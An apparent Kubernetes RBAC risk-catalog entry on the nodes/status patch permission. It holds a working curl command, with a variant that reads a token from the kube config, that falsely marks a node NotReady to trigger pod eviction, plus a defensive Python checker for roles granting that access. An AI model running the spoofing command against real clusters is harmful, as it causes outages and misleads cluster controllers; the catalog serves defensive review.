Patch node status cluster-wide
Tampering
High
Overview
| Field | Value |
|---|---|
| ID | 1069 |
| Name | Patch node status cluster-wide |
| Risk Category | Tampering |
| Risk Level | High |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | nodes/status |
| Verbs | patch, update |
| Tags | DenialOfService NodeManipulation SchedulingAbuse Tampering |
Description
Allows patching or updating the status subresource of any node in the cluster. This can be abused to mark nodes as (un)healthy or (un)schedulable, which affects workload scheduling, can mislead controllers that act on node conditions, or can cause a denial of service.
Abuse Scenarios
- Patch a node’s status to mark it as ‘NotReady’, causing pods to be evicted.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
# PATCH requests need a patch media type: the API server answers 415 Unsupported Media Type
# to "Content-Type: application/json". A strategic merge patch merges the Ready condition
# into the existing conditions list by its "type" key instead of replacing the whole list.
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/strategic-merge-patch+json" -X PATCH \
--data '{"status":{"conditions":[{"type":"Ready","status":"False","reason":"KubeletStopped","message":"Kubelet stopped posting node status."}]}}' \
https://<kubernetes-api-server>/api/v1/nodes/<node-name>/status
# The node's kubelet reports its own Ready condition on its next node status update and overwrites
# this patch, so the spoofed condition persists only while the kubelet is not reporting.
# Example: curl -k -H "Authorization: Bearer $(grep token: ~/.kube/config | awk '{print $2}')" -H "Content-Type: application/strategic-merge-patch+json" -X PATCH --data '{"status":{"conditions":[{"type":"Ready","status":"False","reason":"KubeletStopped","message":"Kubelet stopped posting node status."}]}}' https://127.0.0.1:6443/api/v1/nodes/minikube/status
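A defender's check for this entry, added here as an example that is not part of the original catalog: it flags ClusterRoles whose rules grant patch or update on the core nodes/status subresource, applying the RBAC authorizer's wildcard semantics (apiGroups "*", resources "*" and "*/status", verbs "*") so it goes beyond the literal resource string in the table. The sample roles and their names are constructed for this example.

```python
"""Flag ClusterRoles whose rules grant patch/update on nodes/status, applying the
wildcard semantics of the Kubernetes RBAC authorizer: apiGroups "*", resources "*"
and "*/<subresource>", verbs "*". All sample roles below are constructed."""

CORE_GROUP = ""                   # the core API group is "" in RBAC rules
RISKY_VERBS = ("patch", "update")


def api_group_matches(rule, group):
    return any(g in ("*", group) for g in rule.get("apiGroups", []))


def resource_matches(rule, resource, subresource):
    combined = f"{resource}/{subresource}" if subresource else resource
    for r in rule.get("resources", []):
        if r in ("*", combined):
            return True
        # "*/status" matches any resource's status subresource; note that a
        # bare "nodes" entry does NOT cover the nodes/status subresource.
        if subresource and r == f"*/{subresource}":
            return True
    return False


def rule_grants(rule, group, resource, subresource, verb):
    verbs = rule.get("verbs", [])
    return (api_group_matches(rule, group)
            and resource_matches(rule, resource, subresource)
            and ("*" in verbs or verb in verbs))


def roles_granting_node_status_write(roles):
    """Return the names of roles able to patch or update core nodes/status."""
    return sorted(
        role["metadata"]["name"] for role in roles
        if any(rule_grants(rule, CORE_GROUP, "nodes", "status", verb)
               for rule in role.get("rules", []) for verb in RISKY_VERBS))


# Constructed sample ClusterRoles, not taken from any real cluster.
SAMPLE_ROLES = [
    {"metadata": {"name": "node-status-writer"},      # explicit grant: flagged
     "rules": [{"apiGroups": [""], "resources": ["nodes/status"], "verbs": ["patch"]}]},
    {"metadata": {"name": "node-reader"},             # read-only: not flagged
     "rules": [{"apiGroups": [""], "resources": ["nodes", "nodes/status"], "verbs": ["get", "list"]}]},
    {"metadata": {"name": "node-editor"},             # "nodes" != "nodes/status": not flagged
     "rules": [{"apiGroups": [""], "resources": ["nodes"], "verbs": ["patch", "update"]}]},
    {"metadata": {"name": "status-updater"},          # */status wildcard: flagged
     "rules": [{"apiGroups": ["*"], "resources": ["*/status"], "verbs": ["update"]}]},
    {"metadata": {"name": "cluster-admin-like"},      # full wildcard: flagged
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
]
```

Against a live cluster, pass the `items` list from `kubectl get clusterroles -o json` to `roles_granting_node_status_write`; any flagged role that is not bound to the kubelet's own `system:node` identity deserves review.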